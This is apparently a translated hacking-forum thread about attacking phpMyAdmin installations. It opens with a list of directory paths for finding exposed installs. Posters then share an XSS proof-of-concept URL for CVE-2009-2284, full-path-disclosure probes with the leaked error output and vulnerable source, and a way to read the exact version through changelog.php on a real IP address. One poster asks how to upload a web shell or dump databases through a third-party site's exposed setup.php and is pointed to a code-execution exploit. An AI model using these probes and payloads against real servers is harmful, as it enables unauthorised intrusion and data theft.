/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.1-rc1/
/sqlmanager/
/mysqlmanager/
/p/m/a/
/PMA2005/
/pma2005/
/phpmanager/
/php-myadmin/
/phpmy-admin/
/webadmin/
/sqlweb/
/websql/
/webdb/


(Dm) 14.07.2009 01:28

Regarding the phpMyAdmin (/scripts/setup.php) PHP Code Injection vulnerability, I'll add that phpMyAdmin 2.8.x is also vulnerable.
Tested on phpMyAdmin 2.8.0.3. The main thing is that write permissions are in place (

ZAMUT 27.07.2009 18:30

Quote:

Originally Posted by Spyder
Regarding full path disclosure
In recent versions there is a phpinfo.php file in the PMA root with the corresponding content, and as a rule admins don't delete it

libraries/config.default.php
PHP code:

$cfg['ShowPhpInfo'] = false;

It all depends on the settings. Off by default.

oRb 22.08.2009 14:28

phpMyAdmin SQL bookmark HTML Injection Vulnerability
Code:

Bugtraq ID:        35543
Class:        Input Validation Error
CVE:                CVE-2009-2284
Remote:        Yes
Local:        No
Published:        Jun 30 2009 12:00AM
Updated:        Aug 21 2009 03:57PM
Credit:        Sven Vetsch
Vulnerable:        RedHat Fedora 9 0
                RedHat Fedora 11
                RedHat Fedora 10
                phpMyAdmin phpMyAdmin 3.1.1 1
                phpMyAdmin phpMyAdmin 3.1.1 0
                phpMyAdmin phpMyAdmin 3.1 0
                phpMyAdmin phpMyAdmin 3.0.1
                phpMyAdmin phpMyAdmin 3.0
                phpMyAdmin phpMyAdmin 3.2.0-rc1
                phpMyAdmin phpMyAdmin 3.1.3.2
                phpMyAdmin phpMyAdmin 3.1.3.1
                phpMyAdmin phpMyAdmin 3.0.1.1
                MandrakeSoft Enterprise Server 5 x86_64
                MandrakeSoft Enterprise Server 5

I couldn't find an exploit or a more specific description online. Dug into it myself:
Code:

/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E

speles 27.10.2009 15:18

how to find out the exact phpMyAdmin version

Xcontrol212 16.12.2009 21:49

Path disclosure
phpMyAdmin 2.6.1

Code:

http://localhost/Tools/phpMyAdmin/server_variables.php?lang=ru-win1251&server=1&collation_connection='
Code:

Fatal error: Call to undefined function PMA_reloadNavigation() in Z:\home\localhost\www\Tools\phpmyadmin\header.inc.php on line 132

Vulnerable part:
PHP code:

function PMA_reloadNavigation() {
    global $cfg;

    // Reloads the navigation frame via JavaScript if required
    if (isset($GLOBALS['reload']) && $GLOBALS['reload']) {
        echo "\n";
        $reload_url = './left.php?' . PMA_generate_common_url((isset($GLOBALS['db']) ? $GLOBALS['db'] : ''), '', '&');
        ?>
<script type="text/javascript" language="javascript1.2">
<!--
if (typeof(window.parent) != 'undefined'
    && typeof(window.parent.frames['nav']) != 'undefined') {
    window.parent.frames['nav'].goTo('<?php echo $reload_url; ?>&hash=' + <?php echo (($cfg['QueryFrame'] && $cfg['QueryFrameJS']) ? 'window.parent.frames[\'queryframe\'].document.hashform.hash.value' : "'" . md5($cfg['PmaAbsoluteUri']) . "'"); ?>);
}
//-->
</script>
        <?php
        unset($GLOBALS['reload']);
    }
}

UPD
Code:

http://localhost/Tools/phpMyAdmin/footer.inc.php
Code:

Notice: Undefined variable: cfg in Z:\home\localhost\www\Tools\phpmyadmin\footer.inc.php on line 17
Vulnerable code:
PHP code:

<?php
/* $Id$ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
 * WARNING: This script has to be included at the very end of your code because
 *          it will stop the script execution!
 */

require_once('./libraries/relation.lib.php'); // for PMA_setHistory()

/**
 * Query window
 */

// If query window is wanted and open, update with latest selected db/table.
if ($cfg['QueryFrame'] && $cfg['QueryFrameJS']) {
?>

Code:

http://localhost/Tools/phpMyAdmin/mult_submits.inc.php
Code:

Fatal error: Call to undefined function PMA_DBI_select_db() in Z:\home\localhost\www\Tools\phpmyadmin\mult_submits.inc.php on line 385
Vulnerable code:
PHP code:

        if ($run_parts) {
            $sql_query .= $a_query . ';' . "\n";
            if ($query_type != 'drop_db') {
                PMA_DBI_select_db($db);
            }
            $result = @PMA_DBI_query($a_query) or PMA_mysqlDie('', $a_query, FALSE, $err_url);
        } // end if
    // end for

    if ($use_sql) {
        require('./sql.php');
    } elseif (!$run_parts) {
        PMA_DBI_select_db($db);
        $result = PMA_DBI_query($sql_query);
    }

}

?>



(C)Xcontrol212

Xcontrol212 17.12.2009 02:15

Quote:

Originally Posted by speles
how to find out the exact phpMyAdmin version

Via changelog.php
Example:
http://87.106.94.86/phpmyadmin/changelog.php

KIR@PRO 18.12.2009 14:22

Quote:

Originally Posted by oRb
Code:

/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E

path disclosure in 3.* versions

Quote:

Fatal error: Call to undefined function pma_issuperuser() in /www/html/pma/libraries/check_user_privileges.lib.php on line 16
Tested on version 3.2.0.1
Looks like they patched the XSS, but as always got something else in return, in our case path disclosure ;)

necros555 17.03.2010 01:48

http://tools.hostcommander.net/phpmyadmin/scripts/setup.php
having this kind of access, what can be done? can you upload a shell or dump the database somehow?

Pashkela 17.03.2010 02:57

http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/

Sidarovich1975 11.04.2010 11:36

Quote:

Originally Posted by omel
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

Sorry for the dumb question:
but what do I run this with?
under Windows?

Red_EYEs 11.04.2010 15:55

to: Sidarovich1975
Cygwin =)

LavKraft 10.05.2010 09:55

#!/bin/bash under Windows :confused: Hardly :D

